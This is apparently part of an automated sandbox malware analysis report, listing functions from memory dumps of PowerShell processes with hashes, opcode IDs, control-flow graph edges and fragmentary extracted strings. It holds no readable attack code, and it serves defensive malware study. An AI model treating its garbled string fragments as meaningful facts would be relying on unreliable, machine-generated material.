                                                                  • String ID: fcq$4'^q$4'^q$4'^q$4'^q
                                                                  • API String ID: 0-2717029046
                                                                  • Opcode ID: 7972f0852c7f6beae488126b8c03d801d6e1025a53936cd9481138c69cdbe0bc
                                                                  • Instruction ID: 99424178328fd8d03a1c0b8732453227d84afab677fb92a0e0aa3fa3f0085ea0
                                                                  • Opcode Fuzzy Hash: 7972f0852c7f6beae488126b8c03d801d6e1025a53936cd9481138c69cdbe0bc
                                                                  • Instruction Fuzzy Hash: 87F149B17042059FC765AB78941076BBBA2AFC2310F14897AD546CF392DA36DC8AC7A1
                                                                  Function 076810E0 Relevance: 11.4, Strings: 9, Instructions: 184COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.1822258832.0000000007680000.00000040.00000800.00020000.00000000.sdmp, Offset: 07680000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_7680000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: fcq$`Q^q$`Q^q$tP^q$$^q$$^q$$^q$$^q$$^q
                                                                  • API String ID: 0-2306644927
                                                                  • Opcode ID: 9d123c13dfe671c048e476843816cadc7421c0840f550a9b6837fc30688ef174
                                                                  • Instruction ID: 0c4c5d8f2049858958524cfa71bb45c3b8fd52d1d81ae86a58d3ac024a28ec4c
                                                                  • Opcode Fuzzy Hash: 9d123c13dfe671c048e476843816cadc7421c0840f550a9b6837fc30688ef174
                                                                  • Instruction Fuzzy Hash: A2618EB0A0020EDBDB6DEF18C554BA977F2AB47711F198259E8029B390C735D987CBA1
                                                                  Function 07682838 Relevance: 5.1, Strings: 4, Instructions: 82COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.1822258832.0000000007680000.00000040.00000800.00020000.00000000.sdmp, Offset: 07680000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_7680000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: tP^q$$^q$$^q$$^q
                                                                  • API String ID: 0-3061638629
                                                                  • Opcode ID: f22c2368e26ff55d3af493a732a5034ef8846b3879dc98f409aca6da09cffa34
                                                                  • Instruction ID: 3ad66b37dcf2ff8914f2d61b2e924621ba4f470b9780c845ba315ae08145eba0
                                                                  • Opcode Fuzzy Hash: f22c2368e26ff55d3af493a732a5034ef8846b3879dc98f409aca6da09cffa34
                                                                  • Instruction Fuzzy Hash: 65213DF2A002099FCF649E35C854A65BBE5FF94720F14425AE906DF361CB35DC48C750
                                                                  Function 076803E1 Relevance: 5.0, Strings: 4, Instructions: 47COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.1822258832.0000000007680000.00000040.00000800.00020000.00000000.sdmp, Offset: 07680000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_7680000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 4'^q$4'^q$$^q$$^q
                                                                  • API String ID: 0-2049395529
                                                                  • Opcode ID: 4c48cec535b28668cf074a07690e2211f3112318fe8e7b430e2f4375ecbb8ad9
                                                                  • Instruction ID: 580f55993fe05d25c17bf4ade2144bdce399da0f9ec274da55a7d9acf6f5bc09
                                                                  • Opcode Fuzzy Hash: 4c48cec535b28668cf074a07690e2211f3112318fe8e7b430e2f4375ecbb8ad9
                                                                  • Instruction Fuzzy Hash: E0014971B893869FC37A267818205255F768BC3950B2A09ABC002CF397CC598C4E83A3

                                                                  Execution Graph

                                                                  Execution Coverage:6.5%
                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                  Signature Coverage:0%
                                                                  Total number of Nodes:3
                                                                  Total number of Limit Nodes:0
                                                                  execution_graph 20848 8094e90 20849 8094ed3 SetThreadToken 20848->20849 20850 8094f01 20849->20850

                                                                  Executed Functions

                                                                  Function 0273B628 Relevance: 7.8, Strings: 6, Instructions: 252COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 356 273b628-273b641 357 273b643 356->357 358 273b646-273b981 call 273b254 356->358 357->358 419 273b986-273b98d 358->419
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.1850439989.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_2730000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: #T8p^$3T8p^$CT8p^$ST8p^$cT8p^$sT8p^
                                                                  • API String ID: 0-2300459978
                                                                  • Opcode ID: ba80584ec1a7d98012bde8b30ba3b49c6c6226037fd1405a0585593c0c64dce1
                                                                  • Instruction ID: a8637992c4ded04d843ef84e095adcdbfe8e578d257ea3bb8af8ba32d5ffec02
                                                                  • Opcode Fuzzy Hash: ba80584ec1a7d98012bde8b30ba3b49c6c6226037fd1405a0585593c0c64dce1
                                                                  • Instruction Fuzzy Hash: 99915F71F006155BDB1AEBB488545AEB7E3EF84704B40892DD10AAF340DF746E0A8BD6
                                                                  Function 06F03560 Relevance: 12.9, Strings: 10, Instructions: 439COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 173 6f03560-6f03582 174 6f03588-6f0358d 173->174 175 6f0369a-6f036d0 173->175 176 6f035a5-6f035a9 174->176 177 6f0358f-6f03595 174->177 183 6f036e0 175->183 184 6f036d2-6f036de 175->184 181 6f0364c-6f03656 176->181 182 6f035af-6f035b1 176->182 178 6f03597 177->178 179 6f03599-6f035a3 177->179 178->176 179->176 186 6f03663-6f03669 181->186 187 6f03658-6f03660 181->187 182->181 185 6f035b7-6f035d3 182->185 188 6f036e2-6f036e4 183->188 184->188 200 6f035d5 185->200 201 6f035d7-6f035e3 185->201 190 6f0366b-6f0366d 186->190 191 6f0366f-6f0367b 186->191 192 6f03770-6f0377a 188->192 193 6f036ea-6f036f1 188->193 195 6f0367d-6f03697 190->195 191->195 198 6f03786-6f0378c 192->198 199 6f0377c-6f03783 192->199 196 6f037c2-6f037fe 193->196 197 6f036f7-6f036fc 193->197 216 6f03800-6f0380c 196->216 217 6f0380e 196->217 204 6f03714-6f0373f 197->204 205 6f036fe-6f03704 197->205 206 6f03792-6f0379e 198->206 207 6f0378e-6f03790 198->207 208 6f035e5-6f035f0 200->208 201->208 204->196 225 6f03745-6f03753 204->225 210 6f03706 205->210 211 6f03708-6f03712 205->211 212 6f037a0-6f037bf 206->212 207->212 223 6f035f2-6f035f8 208->223 224 6f03608-6f03649 208->224 210->204 211->204 221 6f03810-6f03812 216->221 217->221 226 6f038f0-6f038fa 221->226 227 6f03818-6f0381a 221->227 228 6f035fa 223->228 229 6f035fc-6f035fe 223->229 236 6f0375a-6f0376d 225->236 234 6f03908-6f0390e 226->234 235 6f038fc-6f03905 226->235 231 6f0382a 227->231 232 6f0381c-6f03828 227->232 228->224 229->224 237 6f0382c-6f0382e 231->237 232->237 238 6f03910-6f03912 234->238 239 6f03914-6f03920 234->239 237->226 241 6f03834-6f03836 237->241 242 6f03922-6f0393e 238->242 239->242 243 6f03850-6f03855 241->243 244 6f03838-6f0383e 241->244 249 6f03857-6f0385d 243->249 250 6f0386f-6f03879 243->250 247 6f03840 244->247 248 6f03842-6f0384e 244->248 247->243 248->243 251 6f03861-6f0386d 249->251 252 6f0385f 249->252 253 6f03941-6f03974 250->253 254 6f0387f-6f0389a 250->254 251->250 252->250 260 6f03984 253->260 261 6f03976-6f03982 253->261 262 6f038b4-6f038ed 254->262 263 6f0389c-6f038a2 254->263 266 6f03986-6f03988 260->266 261->266 264 6f038a4 263->264 265 6f038a6-6f038b2 263->265 264->262 265->262 268 6f0398a-6f039a9 266->268 269 6f039fc-6f03a06 266->269 282 6f039b9 268->282 283 6f039ab-6f039b7 268->283 271 6f03a10-6f03a16 269->271 272 6f03a08-6f03a0d 269->272 275 6f03a18-6f03a1a 271->275 276 6f03a1c-6f03a28 271->276 277 6f03a2a-6f03a41 275->277 276->277 284 6f039bb-6f039bd 282->284 283->284 284->269 285 6f039bf-6f039e4 284->285 289 6f039f2-6f039f9 285->289 290 6f039e6-6f039e8 285->290 290->289
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.1870743705.0000000006F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F00000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_6f00000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                  • API String ID: 0-1065491568
                                                                  • Opcode ID: dd1978151046e2dabcf65ced099f6302b762cdb15f1c6e65f3d174574f738b56
                                                                  • Instruction ID: 67d15bf2fc2e5b5cd98a9019527d0ba0fab59899f4c47eae43c211db87b95a53
                                                                  • Opcode Fuzzy Hash: dd1978151046e2dabcf65ced099f6302b762cdb15f1c6e65f3d174574f738b56
                                                                  • Instruction Fuzzy Hash: 97E14833F083169FE7558B699800A6ABBE6AFC5320B1484ABD545CF3D2DE31DC45C7A1
                                                                  Function 06F027E0 Relevance: 6.7, Strings: 5, Instructions: 486COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 421 6f027e0-6f02805 422 6f029e2-6f02a2d 421->422 423 6f0280b-6f02810 421->423 430 6f02a33-6f02a38 422->430 431 6f02bcc-6f02be4 422->431 424 6f02812-6f02818 423->424 425 6f02828-6f02834 423->425 427 6f0281a 424->427 428 6f0281c-6f02826 424->428 432 6f02989-6f02993 425->432 433 6f0283a-6f0283d 425->433 427->425 428->425 434 6f02a50-6f02a54 430->434 435 6f02a3a-6f02a40 430->435 446 6f02be6-6f02c15 431->446 447 6f02b6f-6f02b76 431->447 438 6f029a1-6f029a7 432->438 439 6f02995-6f0299e 432->439 433->432 437 6f02843-6f0284a 433->437 443 6f02b79-6f02b83 434->443 444 6f02a5a-6f02a5e 434->444 440 6f02a42 435->440 441 6f02a44-6f02a4e 435->441 437->422 445 6f02850-6f02855 437->445 448 6f029a9-6f029ab 438->448 449 6f029ad-6f029b9 438->449 440->434 441->434 450 6f02b91-6f02b97 443->450 451 6f02b85-6f02b8e 443->451 452 6f02a60-6f02a6f 444->452 453 6f02a71 444->453 455 6f02857-6f0285d 445->455 456 6f0286d-6f02871 445->456 457 6f02d64-6f02dbc 446->457 458 6f02c1b-6f02c20 446->458 459 6f029bb-6f029df 448->459 449->459 461 6f02b99-6f02b9b 450->461 462 6f02b9d-6f02ba9 450->462 454 6f02a73-6f02a75 452->454 453->454 454->443 463 6f02a7b-6f02a7d 454->463 464 6f02861-6f0286b 455->464 465 6f0285f 455->465 456->432 466 6f02877-6f0287b 456->466 467 6f02c22-6f02c28 458->467 468 6f02c38-6f02c3c 458->468 470 6f02bab-6f02bc9 461->470 462->470 476 6f02a8d 463->476 477 6f02a7f-6f02a8b 463->477 464->456 465->456 466->432 478 6f02881-6f02885 466->478 479 6f02c2a 467->479 480 6f02c2c-6f02c36 467->480 474 6f02c42-6f02c44 468->474 475 6f02d14-6f02d1e 468->475 481 6f02c54 474->481 482 6f02c46-6f02c52 474->482 483 6f02d20-6f02d29 475->483 484 6f02d2c-6f02d32 475->484 485 6f02a8f-6f02a91 476->485 477->485 488 6f02887-6f02896 478->488 489 6f02898 478->489 479->468 480->468 493 6f02c56-6f02c58 481->493 482->493 494 6f02d34-6f02d36 484->494 495 6f02d38-6f02d44 484->495 485->443 496 6f02a97-6f02ab1 485->496 497 6f0289a-6f0289c 488->497 489->497 493->475 498 6f02c5e-6f02c76 493->498 500 6f02d46-6f02d61 494->500 495->500 509 6f02ab3-6f02abc 496->509 510 6f02ad4 496->510 497->432 501 6f028a2-6f028a4 497->501 515 6f02c90-6f02c94 498->515 516 6f02c78-6f02c7e 498->516 502 6f028b4 501->502 503 6f028a6-6f028b2 501->503 507 6f028b6-6f028b8 502->507 503->507 507->432 513 6f028be-6f028f0 507->513 517 6f02ac3-6f02ad0 509->517 518 6f02abe-6f02ac1 509->518 512 6f02ad7-6f02ad9 510->512 519 6f02af3-6f02af9 512->519 520 6f02adb-6f02ae1 512->520 543 6f028f2-6f028f8 513->543 544 6f0290a-6f0291b 513->544 565 6f02c97 call 273e578 515->565 566 6f02c97 call 273e568 515->566 521 6f02c80 516->521 522 6f02c82-6f02c8e 516->522 523 6f02ad2 517->523 518->523 567 6f02afc call 2737570 519->567 568 6f02afc call 2737580 519->568 526 6f02ae3 520->526 527 6f02ae5-6f02af1 520->527 521->515 522->515 523->512 525 6f02c9a-6f02ca1 530 6f02ca3-6f02ca6 525->530 531 6f02ca8-6f02d05 525->531 526->519 527->519 534 6f02d0a-6f02d11 530->534 531->534 532 6f02aff-6f02b06 537 6f02b08-6f02b0b 532->537 538 6f02b0d-6f02b6a 532->538 537->447 538->447 545 6f028fa 543->545 546 6f028fc-6f02908 543->546 551 6f0291d 544->551 552 6f0291f-6f0292b 544->552 545->544 546->544 554 6f0292d-6f02986 551->554 552->554 565->525 566->525 567->532 568->532
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.1870743705.0000000006F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F00000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_6f00000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 4'^q$4'^q$Jk$Jk$Jk
                                                                  • API String ID: 0-1485394204
                                                                  • Opcode ID: 93da515a96e693ce53aedc8deae104ec9a320bd9bc2959508f7d267034fa3ac1
                                                                  • Instruction ID: 997843e2af12ca8e05e235cd165045b02f82a8663f6b50e0f4c16a6606f60585
                                                                  • Opcode Fuzzy Hash: 93da515a96e693ce53aedc8deae104ec9a320bd9bc2959508f7d267034fa3ac1
                                                                  • Instruction Fuzzy Hash: F8F13631F042059FEB608F689848A6BBBE6EF85320F14846AE505CB391DF35CE85D7B1
                                                                  Function 0273B2C1 Relevance: 1.3, Strings: 1, Instructions: 87COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 615 273b2c1-273b2c8 616 273b30b 615->616 617 273b2ca-273b308 615->617 619 273b312-273b351 616->619 617->619 625 273b35b-273b366 619->625 637 273b369 call 273b3f9 625->637 638 273b369 call 273b408 625->638 626 273b36f-273b3f4 call 273aec4 637->626 638->626
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.1850439989.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_2730000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: sW8p^
                                                                  • API String ID: 0-780651375
                                                                  • Opcode ID: 7edb58903f0adfc1097233346427751a1030d13557d8b6ba8a5b5695e502d182
                                                                  • Instruction ID: 4a86d7f564f2e64dc1267aa1480c93d043bd0ae7ebed8f6644b2656f39149461
                                                                  • Opcode Fuzzy Hash: 7edb58903f0adfc1097233346427751a1030d13557d8b6ba8a5b5695e502d182
                                                                  • Instruction Fuzzy Hash: E0318DB4E002099FDB05EB64D855ABEBBB3EF84304F1184B8D145AB396DA399D058FA1
                                                                  Function 0273B2D0 Relevance: 1.3, Strings: 1, Instructions: 77COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 654 273b2d0-273b366 673 273b369 call 273b3f9 654->673 674 273b369 call 273b408 654->674 662 273b36f-273b3f4 call 273aec4 673->662 674->662
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.1850439989.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_2730000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: sW8p^
                                                                  • API String ID: 0-780651375
                                                                  • Opcode ID: 8734c551a1d0c0c7ab4f5ff06c7e46134c3c8a6306a28907056c4528b67d7ff0
                                                                  • Instruction ID: eae4d470f5ae17716ead25f6aabf8509bf9faf2ff5fdf1e53c63bb3b62e10679
                                                                  • Opcode Fuzzy Hash: 8734c551a1d0c0c7ab4f5ff06c7e46134c3c8a6306a28907056c4528b67d7ff0
                                                                  • Instruction Fuzzy Hash: 46312874E002099FDB05EFA4D859ABFB7B3EF84301F1184B8D545AB395DA399D428FA0
                                                                  Function 0273C060 Relevance: .2, Instructions: 155COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.1850439989.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_2730000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e2bbf04fb4f19ce4ad859b69be222261ca0bf18741bb607f6264bea1fb73e4df
                                                                  • Instruction ID: a1514259155b317a27cba72cc240f80c064bcdd528151a93be021b39a1de6384
                                                                  • Opcode Fuzzy Hash: e2bbf04fb4f19ce4ad859b69be222261ca0bf18741bb607f6264bea1fb73e4df
                                                                  • Instruction Fuzzy Hash: 676106B1E002489FDB15CFA9C984A8DFBF6FF88310F14816AE809AB355EB359945CF50
                                                                  Function 0273C051 Relevance: .2, Instructions: 153COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.1850439989.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_2730000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: d1679cb739b6dc66e2f928201c1fc2a4b08a485037bd649cbca455701d875525
                                                                  • Instruction ID: d2055906796d9f22d673e2a880fb86e9ffc16c85adf8463344d223a71bdf44e6
                                                                  • Opcode Fuzzy Hash: d1679cb739b6dc66e2f928201c1fc2a4b08a485037bd649cbca455701d875525
                                                                  • Instruction Fuzzy Hash: 115127B1E002489FCB15CFA9D984A8DFBF6EF88310F14816AE809AB355DB319945CF90
                                                                  Function 0273B3F9 Relevance: .1, Instructions: 92COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.1850439989.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_2730000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: aba7c85f47836a52d67cffa4750dc48e2c31633736656c8807e627356e3598d6
                                                                  • Instruction ID: 8b0d8d36b135715e307166a2fa9549584a7ccc4fe10fbf612879397b1ce3d553
                                                                  • Opcode Fuzzy Hash: aba7c85f47836a52d67cffa4750dc48e2c31633736656c8807e627356e3598d6
                                                                  • Instruction Fuzzy Hash: DB319A70A002099FDB06DFBDD4957AEBBF6AF89314F148069E405EB351EB7488408BA1
                                                                  Function 06F029F4 Relevance: .1, Instructions: 81COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.1870743705.0000000006F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F00000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_6f00000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: f8087564e01142c4c306dbd8343104cdb7b768593fbc8e6cd5e19f8dba122226
                                                                  • Instruction ID: 2fe732b5ac2d3141bd51f3841a0f0a26c60e6cca82c2c6ce1fbd40da6cc11bb6
                                                                  • Opcode Fuzzy Hash: f8087564e01142c4c306dbd8343104cdb7b768593fbc8e6cd5e19f8dba122226
                                                                  • Instruction Fuzzy Hash: 2E31AE71E04205DFFFB08F58C988B6677F0EB44360F2980A6D8158B291DB75DA84EBB1
                                                                  Function 0263F4B0 Relevance: .1, Instructions: 76COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.1849796020.000000000263D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0263D000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_263d000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 2e45577e921591d890e6f84e3306ae94e7871e23123edd55ae12a160f419819e
                                                                  • Instruction ID: eb2b2ce1abf4fe901b55522b075e7d5816e0a0040c4cddf8434077aecbb8a578
                                                                  • Opcode Fuzzy Hash: 2e45577e921591d890e6f84e3306ae94e7871e23123edd55ae12a160f419819e
                                                                  • Instruction Fuzzy Hash: FB21F172904200EFDF1ADF14D9C0B26BFA5FB98324F24C5A9E9094B756C336D456CBA1
                                                                  Function 0273E3E0 Relevance: .1, Instructions: 69COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.1850439989.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_2730000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: f17cecf9cad492dd5127fa62ed8aed33de23d5605b4b058c56f98f60c8f7e3ea
                                                                  • Instruction ID: b611e085dbc593855475b515e923dd5e2ff0ce7bb02a0daf4402803e812f0825
                                                                  • Opcode Fuzzy Hash: f17cecf9cad492dd5127fa62ed8aed33de23d5605b4b058c56f98f60c8f7e3ea
                                                                  • Instruction Fuzzy Hash: 1A11E735B04250CFCB139B38D458AADBFB69FCA22572400ABF485DB263CB34D841C791
                                                                  Function 06F036AC Relevance: .1, Instructions: 66COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.1870743705.0000000006F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F00000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_6f00000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 381dd044c597ff18f9ad30dd1c606a9a9e898efcf91de350a8db1450cd69b88c
                                                                  • Instruction ID: 500d454f2d888c8b28f647bb9283a3ca2dc2ad122a54cd421e77783c19cf9a66
                                                                  • Opcode Fuzzy Hash: 381dd044c597ff18f9ad30dd1c606a9a9e898efcf91de350a8db1450cd69b88c
                                                                  • Instruction Fuzzy Hash: 3F11DA76A08201DFF750CB55CC50E66BBBAFF41350F098466E4048B392C735DC85CB60
                                                                  Function 0273C280 Relevance: .1, Instructions: 62COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.1850439989.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_2730000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6e6bed8a8e6a7268eefdf346540f49b8d2c957a0a58ff25ddf43a657c1292277
                                                                  • Instruction ID: b40df75ccd631823f60f355deecc1a1955532c508834612e54fb22a08524ca2a
                                                                  • Opcode Fuzzy Hash: 6e6bed8a8e6a7268eefdf346540f49b8d2c957a0a58ff25ddf43a657c1292277
                                                                  • Instruction Fuzzy Hash: 611106316087445FC316CB79D89469A7FE0EF45720B1444DFD08ADB6A2DF30A886C780
                                                                  Function 0263F4AB Relevance: .1, Instructions: 57COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.1849796020.000000000263D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0263D000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_263d000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: ac59097383679d3c36945f3a55f47b1b34a77431d90e23eb4db771cfbaa4427a
                                                                  • Instruction ID: 9e23f933a3589a8bbbdeb8a122c575cd5fc943618b6671a0b158f62c59cadd7a
                                                                  • Opcode Fuzzy Hash: ac59097383679d3c36945f3a55f47b1b34a77431d90e23eb4db771cfbaa4427a
                                                                  • Instruction Fuzzy Hash: 81219D76904240DFCF16CF14D9C4B16BF72FB58324F24C5A9E9094A656C33AD46ACF91
                                                                  Function 0273E280 Relevance: .1, Instructions: 55COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.1850439989.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_2730000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 013bc9832136f2ec06f429b45319ba9a4f6ac7f389b7370727322fdb2d921d7b
                                                                  • Instruction ID: 9ea7c7be46f43de1e2cf5bcbab5115cd8789f4dc4c36b2918d30140151b9bf49
                                                                  • Opcode Fuzzy Hash: 013bc9832136f2ec06f429b45319ba9a4f6ac7f389b7370727322fdb2d921d7b
                                                                  • Instruction Fuzzy Hash: 2F0197327000109BC71696AEF4004DFBBA2EFC8361740803FE41A9B301CF32990A87C6
                                                                  Function 0263D01D Relevance: .0, Instructions: 45COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.1849796020.000000000263D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0263D000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_263d000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: adf16f5c8a4f0065470f73b4b9d65f780d656dfbccb656cf0a6571fd3294be42
                                                                  • Instruction ID: 627bd9f38e5d73afaf70e055a584a766f5c9fdc26cc8f86589ba5edf67d738ac
                                                                  • Opcode Fuzzy Hash: adf16f5c8a4f0065470f73b4b9d65f780d656dfbccb656cf0a6571fd3294be42
                                                                  • Instruction Fuzzy Hash: BE01DB714093809AE7164E25CD84B67BF98DF41724F18C52AED594B246C779D882C6B1
                                                                  Function 0263D007 Relevance: .0, Instructions: 44COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.1849796020.000000000263D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0263D000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_263d000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 83c2dafde8ea2046ecf190d791837d48172c6cc993e735e8715793055a559f55
                                                                  • Instruction ID: a589d8cac91f72d139b3eba7ac0b46955468365af042ed6ac68379167ebdc7d3
                                                                  • Opcode Fuzzy Hash: 83c2dafde8ea2046ecf190d791837d48172c6cc993e735e8715793055a559f55
                                                                  • Instruction Fuzzy Hash: BF015E6200E3C09ED7138B258894B52BFB4EF43624F1DC5CBD8888F2A3C3699849C772
                                                                  Function 0273E230 Relevance: .0, Instructions: 43COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.1850439989.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_2730000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: f6cffa08d396aac4c3e1aef81675bbc2b2cb85a7846d25b29ebec1479bdc4cd1
                                                                  • Instruction ID: e37ed9c76c81058e3157f4c7c749275b3f4132245bccd61c827faca6e4b186eb
                                                                  • Opcode Fuzzy Hash: f6cffa08d396aac4c3e1aef81675bbc2b2cb85a7846d25b29ebec1479bdc4cd1
                                                                  • Instruction Fuzzy Hash: B6F0F6717006509FC723AB6DB9104CEBBA2EFC56B1744406AE02DCB311DB659D0A4BD6
                                                                  Function 02739270 Relevance: .0, Instructions: 41COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.1850439989.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_2730000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
